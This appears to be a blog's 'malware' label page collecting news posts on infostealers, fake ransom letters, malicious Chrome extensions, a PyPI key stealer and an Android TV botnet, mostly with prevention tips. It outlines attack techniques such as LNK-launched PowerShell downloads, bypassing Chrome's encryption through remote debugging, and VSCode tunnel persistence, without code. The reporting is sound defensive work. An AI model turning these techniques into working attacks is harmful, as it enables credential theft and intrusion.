Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
Visual Studio Code
Infostealer LNK File malware Phantom Goblin Visual Studio Code

Phantom Goblin: An Emerging Menace in Credential Theft and Remote System Access

 

A complex malware campaign dubbed "Phantom Goblin" has been discovered, which employs social engineering techniques to install information-stealing malware. The malware is distributed by RAR attachments in spam messages, which includes a poisoned shortcut file posing as a PDF. 

When executed, the LNK file launches a PowerShell operation to download further payloads from a GitHub repository, ensuring persistence by generating a registry entry that starts at system boot. These payloads, such as "updater.exe," "vscode.exe," and "browser.exe," spoof legitimate apps, which complicates detection. 

The malware primarily targets web browsers and development tools to steal sensitive data. It harvests cookies, login passwords, and browsing history by forcing browsers such as Chrome, Brave, and Edge to shut down. The "updater.exe" payload allows remote debugging to bypass Chrome's App Bound Encryption (ABE) and achieve covert data exfiltration. The stolen information is subsequently transferred to a Telegram channel via the Telegram Bot API. This approach allows cybercriminals to access data in real time without suspicion. 

Phantom Goblin also uses Visual Studio Code (VSCode) tunnels for remote unauthorised access. The "vscode.exe" payload downloads a legitimate version of VSCode, unpacks it, and creates a tunnel to maintain persistent control over compromised PCs. These connection credentials are passed to a Telegram bot, which allows remote access without triggering traditional security notifications. 

Prevention tips

Several best practices are recommended by experts to safeguard systems against Phantom Goblin and similar threats:

Email Filtering: Use advanced filtering techniques to block suspicious attachments, especially those in RAR, ZIP, or LNK format. Before opening any attachments, be sure they have been scanned with the latest antivirus software. 

Disabling VSCode tunnels: Enforce access controls and authentication measures to prevent unauthorised users from using Visual Studio Code tunnels. Limiting the ability to use VSCode on sensitive systems can help prevent remote access. 

PowerShell Restrictions: Disable or limit the use of PowerShell and script execution on computers unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as script execution from external sources, can assist detect and prevent malicious operations. 

Browser Security: Use strong browser security mechanisms to prevent unauthorised debugging and limit access to sensitive data stored within browsers. Enforcing multi-factor authentication (MFA) and session timeouts can assist to secure browser-based credentials.
Read more »
Scam
Cybersecurity FBI malware Ransom Scam

FBI Warns of Fake Ransom Demands Sent by Mail to US Executives

 



A new scam is targeting top business leaders in the United States, where criminals are sending letters demanding large ransom payments. Unlike typical ransomware attacks that involve hacking into computer systems, this scheme relies on physical mail. The letters claim that hackers have stolen company data and will leak it unless a ransom of $250,000 to $500,000 is paid. However, cybersecurity experts believe this is a fraud, with no actual hacking involved.  


How the Scam Works  

Investigators from the GuidePoint Research and Intelligence Team (GRIT) discovered that several companies have received these ransom letters through the US Postal Service (USPS). The letters are addressed to high-level executives and claim to be from the BianLian ransomware group, a known cybercriminal organization.  

The message states that the company's confidential information has been stolen and will be exposed unless the demanded payment is made within ten days. To make the threat appear real, the letter includes a Bitcoin wallet address and a QR code that links directly to it. Some letters also provide links to BianLian’s dark web site to add legitimacy to the claim.  

Despite these details, security analysts have found no proof that any actual data theft has occurred. The scam relies on fear and deception, hoping that executives will panic and send money.  


Why Experts Believe the Threat Is Fake  

Cybersecurity specialists have carefully examined multiple cases of this scam and found no signs of hacking or data breaches. The companies targeted in this scheme have not reported any unusual activity or unauthorized access to their systems. This strongly suggests that the criminals behind the letters are only pretending to be the BianLian ransomware group.  

The FBI has confirmed that these letters are part of a fraud campaign and do not represent a real cyberattack. Many of the envelopes are marked as "Time Sensitive" to create urgency, and some even list a return address in Boston, Massachusetts, which appears to be another false detail.  

Since there is no actual ransomware attack, businesses do not need to take technical action like removing malware or restoring stolen files. The main risk comes from executives believing the scam and paying the ransom.  


What to Do If You Receive One of These Letters  

If your company receives a similar ransom demand, take the following precautions:  

1. Check Your Systems for Security Issues – Ensure that company networks are protected and that there are no signs of hacking or data leaks. Keeping cybersecurity measures updated is always important.  

2. Do Not Send Any Money – These threats are fake, and paying the ransom will only encourage further scams.  

3. Report the Scam – Contact law enforcement and inform the nearest FBI field office about the letter. Complaints can also be filed with the Internet Crime Complaint Center (IC3).  

4. Inform Key Personnel – Let executives and employees know about this scam so they can recognize and ignore similar fraud attempts in the future.  

 

This scam is a reminder that cybercriminals do not always rely on advanced hacking techniques. Sometimes, they use old-fashioned methods like physical mail to create fear and manipulate victims into paying. While real ransomware attacks remain a serious concern, this particular scheme is based on false claims.  

Companies should stay informed and take precautions to avoid falling victim to these types of fraud. Being aware of such scams is the best way to protect against them.

Read more »
NordVPN
fake websites Google links malware Microsoft NordVPN

Fake Websites and Malware Threats: How to Stay Safe Online

 



Recent research from the cybersecurity company NordVPN has revealed a significant rise in online threats, with over 669 million malware attacks recorded in the UK in 2024 alone. This alarming number highlights the increasing risk of falling victim to fake websites, harmful ads, and malicious software, especially when browsing popular websites or using free video streaming platforms.  


Fake Websites Imitating Well-Known Brands  

Cybercriminals often create websites that look almost identical to popular tech companies like Google, Facebook, and Microsoft. Their main goal is to trick people into providing their login details, which can then be misused for criminal activities.  

NordVPN’s research shows that in 2024, over 85,000 fake web links were created to imitate Google's official platforms. Similarly, around 6,000 fake links were designed to look like Facebook, and nearly 5,000 were made to mimic Microsoft. Other major companies such as AT&T, Yahoo!, and Netflix were also targeted, with around 4,000 fake URLs created for each.  

A common tactic used by scammers is slightly altering the spelling of well-known brand names, hoping that people won't notice the difference. For example, they may change "Google" to "G00gle" or "Amazon" to "Arnazon." This simple trick often convinces users to enter their login details, unknowingly handing their information over to cybercriminals.  

Although these major tech companies have no involvement in the fraud, their popularity makes them easy targets for impersonation. Because people generally trust these brands, they often do not realize they have been scammed until it’s too late.  


Malware Hidden on Video Hosting Platforms  

Another major source of cyber threats is free video streaming websites, where users often go to watch movies, shows, or anime. According to NordVPN’s findings, over 1.5 billion attempts to infect devices with malware were blocked on such sites in 2024 alone.  

Websites related to entertainment, sports, and file-sharing are especially vulnerable. Malware infections on entertainment websites alone reached almost one billion, while sports sites recorded around 124 million attacks. Additionally, adult content sites and file-sharing platforms faced millions of malware infiltration attempts.  

The risk doesn't stop at malware. Many of these websites are filled with intrusive advertisements and hidden web trackers designed to collect user data. These trackers monitor your online activity, gathering information about your browsing habits, interests, and personal details. While companies use this data to target you with advertisements, it can become dangerous if hackers gain access to it.  


Understanding the Threats: Malware, Trackers, and Intrusive Ads  

Malware, short for malicious software, refers to harmful programs like viruses, spyware, ransomware, and trojans. If malware infects your device, it can steal your sensitive information, lock your files, or even give hackers full control of your device. This often happens when users unknowingly download files from untrusted websites or click on suspicious links.  

Trackers are small tools placed on websites to monitor your online behavior. Companies use this information for marketing purposes, but if the data is leaked, it can be misused by hackers for malicious purposes.  

Intrusive advertisements, commonly seen on free video streaming sites, pose another risk. These ads not only disrupt your browsing experience but can also direct you to harmful websites or secretly install malware on your device without your consent.  


Tips to Protect Yourself from Cyber Threats  

Cybersecurity expert Adrianus Warmenhoven suggests some practical ways to protect yourself from online threats like malware, intrusive ads, and web trackers. Here’s how you can stay safe:  

1. Avoid Free or Suspicious Websites

Websites offering free video hosting, downloads, or pirated content often hide harmful software. Avoid visiting such sites, as they are more likely to infect your device with malware.  

2. Be Careful with Unknown Emails and Messages

Cybercriminals often use emails or messages that promise big rewards or urgent updates to trick you into giving away personal information. Avoid clicking on links in emails that sound too good to be true or ask for your data.  

3. Always Verify Links Before Clicking  

Scammers often create fake links that look similar to popular websites. For example, a fake website might spell "Amazon" as "Arnazon" to confuse you. Always double-check the spelling of website links before clicking on them.  

4. Check Files Before Downloading

Malware can often be hidden in files disguised as legitimate downloads. To avoid downloading harmful files, always use reliable websites and scan files with antivirus software before opening them.  

5. Protect Your Personal Information

Limit the amount of personal information you share online, especially on social media. Cybercriminals can misuse details like your full name, location, or contact information for scams or identity theft.  

6. Keep Your Devices Updated 

Outdated software can make your device vulnerable to malware and other cyber threats. Regularly update your operating system, apps, and security software to patch any security flaws.  

By following these steps, you can reduce the risk of falling victim to online threats and ensure your personal information remains safe.

Read more »
remote access
Data Leak Infostealer malware Microsoft Teams remote access

Cybercriminals Abuse Microsoft Teams & Quick Assist for Remote Access

 

Trend Micro security experts discovered a sophisticated cyberattack that included social engineering tactics and commonly employed remote access tools. The attack, which uses stealthy infostealer malware, gives thieves permanent access over vulnerable PCs and allows them to steal sensitive data.

According to Trend Micro Threat Intelligence, the majority of incidents since October 2024 have been concentrated in North America, with 21 breaches reported. The US was the most affected, with 17 cases, followed by Canada and the United Kingdom, each with five. Europe documented a total of 18 incidents. 

Modus operandi 

Threat actors utilise social engineering techniques to acquire initial access by deceiving victims into submitting credentials. Microsoft Teams is used for impersonation, and Quick Assist and other remote access applications allow attackers to escalate privileges. OneDriveStandaloneUpdater.exe, a genuine OneDrive update application, is used to sideload malicious DLLs and grant attackers network access.

Subsequently, the attackers install BackConnect malware, which allows them to keep control of affected systems. Malicious files are hosted and propagated via commercial cloud storage services, leveraging misconfigured or publicly available storage buckets. 

The BackConnect malware has been linked by researchers to QakBot, a loader malware that was the focus of the 2023 takedown effort called "Operation Duckhunt." Access to target computers by Black Basta ransomware attackers was made possible in large part via QakBot. After it was taken down, these threat actors switched to alternative methods to continue operating. 

Black Basta and Cactus ransomware link 

Trend Micro analysts recently investigated cases in which the Black Basta and Cactus ransomware perpetrators used the identical BackConnect malware. This malware allows cybercriminals to execute commands remotely, steal credentials, and steal financial information.

In 2023, Black Basta alone extorted $107 million from victims, with manufacturing the largest hit, followed by financial sectors and real estate. Attackers also utilised WinSCP, an open-source file transfer client, to move data within infected systems. The infected files were first acquired from a cloud storage provider before being repackaged and distributed using system vulnerabilities. 

Further investigation into Black Basta's internal chat breaches indicates that members of the gang are now using Cactus ransomware. Researchers believe that this transition will allow Cactus to remain a major threat by 2025.
Read more »
Polymorphic Attack
cyber attack Google malware Online Scams Phishing Attack Polymorphic Attack

New Polymorphic Attack Enables Malicious Chrome Extensions to Impersonate Password Managers and Banking Apps

Researchers at SquareX Labs have uncovered a sophisticated “polymorphic” attack targeting Google Chrome extensions, allowing malicious extensions to seamlessly morph into trusted ones, such as password managers, cryptocurrency wallets, and banking apps. The attack exploits Chrome’s ‘chrome.management’ API to gain insights into the user’s installed extensions and then impersonates them to steal sensitive information. 

The attack begins when an unsuspecting user installs a seemingly legitimate extension—such as an AI-powered marketing tool—through the Chrome Web Store. Once installed, the extension gains access to the list of other installed extensions using the ‘chrome.management’ API. If this permission is not granted, attackers can use a stealthier approach, injecting malicious code into web pages to detect installed extensions based on unique resource requests. 

This information is then sent to an attacker-controlled server, which determines whether a targeted extension is present. If a high-value target, such as a password manager, is detected, the malicious extension initiates the impersonation process. SquareX demonstrated how attackers could disable a legitimate extension, like 1Password, using the ‘chrome.management’ API or by manipulating the user interface to hide it. Simultaneously, the malicious extension changes its name, icon, and behavior to mimic the real one. 
To lure victims into entering their credentials, attackers deploy deceptive tactics, such as displaying fake session expiration messages that prompt users to log back in via a phishing form.

The stolen credentials are then sent to the attackers, after which the malicious extension reverts to its original state and re-enables the genuine extension, making detection nearly impossible. 

SquareX Labs has responsibly disclosed the vulnerability to Google, warning that it remains exploitable even in the latest Chrome version. The researchers recommend that Google strengthen security measures by restricting abrupt extension modifications, such as icon or HTML changes, or at the very least, issuing user alerts when such modifications occur. They also criticize Google’s classification of the ‘chrome.management’ API as a “medium risk,” given its extensive use in widely trusted extensions, including ad blockers and password managers. 

As of now, Google has not implemented any direct countermeasures against this attack. BleepingComputer has reached out to the company for a statement and will update its report accordingly. Meanwhile, users are advised to exercise caution when installing Chrome extensions and to be wary of unusual login prompts that could be phishing attempts.
Read more »
Youtube
Blackmail Internet malware Russia SilentCryptominer Social Media Youtube

SilentCryptominer Threatens YouTubers to Post Malware in Videos

SilentCryptominer Threatens YouTubers to Post Malware in Videos

Experts have discovered an advanced malware campaign that exploits the rising popularity of Windows Packet Divert drivers to escape internet checks.

Malware targets YouTubers 

Hackers are spreading SilentCryptominer malware hidden as genuine software. It has impacted over 2000 victims in Russia alone. The attack vector involves tricking YouTubers with a large follower base into spreading malicious links. 

“Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives,” reports Secure List. This helps threat actors by “allowing them to persist in an unprotected system without the risk of detection. 

Innocent YouTubers Turned into victims

Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency.” Few commonly found malware in the distribution scheme are: Phemedrone, DCRat NJRat, and XWorm.

In one incident, a YouTuber with 60k subscribers had put videos containing malicious links to infected archives, gaining over 400k views. The malicious links were hosted on gitrock[.]com, along with download counter crossing 40,000. 

The malicious files were hosted on gitrok[.]com, with the download counter exceeding 40,000.

Blackmail and distributing malware

Threat actors have started using a new distribution plan where they send copyright strikes to content creators and influencers and blackmail them to shut down channels if they do not post videos containing malicious links. The scare strategy misuses the fame of the popular YouTubers to distribute malware to a larger base. 

The infection chain starts with a manipulated start script that employs an additional executable file via PowerShell. 

As per the Secure List Report, the loader (written in Python) is deployed with PyInstaller and gets the next-stage payload from hardcoded domains.  The second-stage loader runs environment checks, adds “AppData directory to Microsoft Defender exclusions” and downloads the final payload “SilentCryptominer.”

The infamous SilentCryptoMiner

The SilentCryptoMiner is known for mining multiple cryptocurrencies via different algorithms. It uses process hollowing techniques to deploy miner code into PCs for stealth.

The malware can escape security checks, like stopping mining when processes are running and scanning for virtual environment indicators. 

Read more »
python
Crypto Wallets Developers Ethereum malware PyPI python

Latest PyPi Malware Steals Ethereum Private Keys, Developers Targeted

Latest PyPi Malware Steals Ethereum Private Keys, Developers Targeted

Researchers at Socket have exposed a malicious PyPi (Python Package Index package), set-utils, that steals Ethereum private keys by abusing a “commonly used account creation functions.” 

Masked as a simple utility tool for Python sets, the package imitates commonly used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads). The trap baits innocent developers into installing the malicious package, allowing hackers unauthorized entry to Ethereum wallets. 

Since the start of this year, set-utils has been downloaded over 1000 times, exposing Ethereum users and developers to risk. The package attacks people working with blockchain technology, especially developers using Python-based wallet management libraries like eth-account. 

The package hacks Ethereum account creation to steal private keys through the blockchain by exploiting https://rpc-amoy.polygon.technology/ as a Command and Control server (C2). This lets hackers retrieve stolen credentials covertly. 

PyPi Targets

PyPi targets Ethereum developers and businesses working with Python-based blockchain apps. These include:

  • Web3 apps and crypto exchanges integrating Ethereum transactions.
  • Users having personal Ethereum wallets via Python automation. 
  • Blockchain developers using the eth-account for wallet creation and handling.
  • People who installed the package may expose their private keys to hackers, causing major financial losses. 

Consequences of PyPi attack

  • Stealing Ethereum private keys: PyPi ties into standard wallet creation methods, which makes it difficult to notice.
  • Exploit of Polygon RPC (rpc-amoy.polygon.technology/) as a C2 channel: By not using traditional network extraction, hackers hide stolen data inside blockchain transactions, making it difficult to detect.
  • Hardcoded hacker-controlled RSA public key: The private keys are encrypted and then sent, hiding the data from basic monitoring. 
  • Permanent breach: Even if a user uninstalls set-utils, Ethereum wallets made “while it was active are already exposed and compromised.”

Controlling the damage

For mitigating risk, businesses and developers should implement robust measures to protect software supply chains. Routine dependency audits and using automated scanning software can help detect malicious or suspicious behaviours in third-party packages when they are incorporated into production environments. 

According to Socket, “Integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks.”  Socket has notified the PyPI team, and “it was promptly removed to prevent further attacks.”

Read more »
Vo1d
Android TV DDOS Attacks malware Vo1d

Malware Attack on Android TV Devices Affects Over 1.6 Million Users

 



Cybersecurity researchers have discovered a new form of malware that is spreading through Android TV devices across the globe. This malware, known as Vo1d, has already infected over 1.6 million devices, turning them into remote-controlled bots used for illegal activities without the owners’ knowledge.  

The Vo1d malware has existed for a while, but researchers at XLab recently identified a stronger, more advanced version that makes it harder to detect and remove. This upgraded variant has been designed to avoid being analyzed or controlled by cybersecurity experts, making it a serious concern for Android TV users.  


How the Vo1d Malware Works  

Once Vo1d malware enters an Android TV device, it secretly connects it to a network controlled by hackers, known as a botnet. This allows the attackers to control thousands of devices at once without the owners realizing it. These devices are then used to carry out illegal activities like DDoS attacks and ad click fraud.  

In a DDoS (Distributed Denial of Service) attack, a large number of devices flood a website or service with so many requests that it crashes, making it inaccessible. On the other hand, ad click fraud involves the infected devices automatically clicking on online ads, creating fake revenue for dishonest advertisers. Both of these activities can cause financial losses to companies and harm online platforms.  

The malware has been particularly active in countries like Argentina, Brazil, China, Indonesia, South Africa, and Thailand. However, since it is spreading rapidly, users in other countries should also remain cautious.  


Why This Malware Is Difficult to Detect  

One of the main challenges with the new Vo1d variant is that it uses advanced encryption methods, which prevent cybersecurity professionals from studying or controlling it. It also hides deep within the device’s system, making it nearly impossible for regular antivirus software to detect and remove it.  

This ability to stay hidden allows the malware to operate silently for long periods, allowing hackers to keep using the device for illegal purposes. As a result, users may remain unaware that their device has been compromised.  


How to Protect Your Android TV Device  

To reduce the chances of your Android TV being infected by Vo1d, consider following these precautionary steps:  

1. Buy From Trusted Sources: Always purchase Android TV devices from well-known brands or official retailers. Avoid buying from unknown sellers, as some devices may already be compromised before purchase.  

2. Update Regularly: Install all firmware and security updates provided by the device manufacturer. These updates often fix vulnerabilities that malware exploits.  

3. Download Apps Carefully: Only download apps from official platforms like the Google Play Store. Avoid installing apps from third-party websites, as they may carry hidden malware.  

4. Watch for Unusual Activity: If your Android TV starts slowing down, overheating, or using too much data without reason, it may be infected. In such cases, reset your device and consider installing a trusted antivirus app.  

5. Secure Your Network: Make sure your home Wi-Fi has a strong password and activate firewall settings to reduce the chances of remote attacks.    


The rapid spread of Vo1d malware has raised concern among cybersecurity experts. With over 1.6 million devices already infected, users need to stay alert and take protective measures. By purchasing devices from verified sources, keeping software updated, and avoiding untrusted apps, users can reduce their risk of falling victim to such malware attacks.  

Staying informed about new threats and remaining cautious with device usage is the best way to keep your Android TV safe from harmful malware like Vo1d.

Read more »
Subscribe to: Posts (Atom)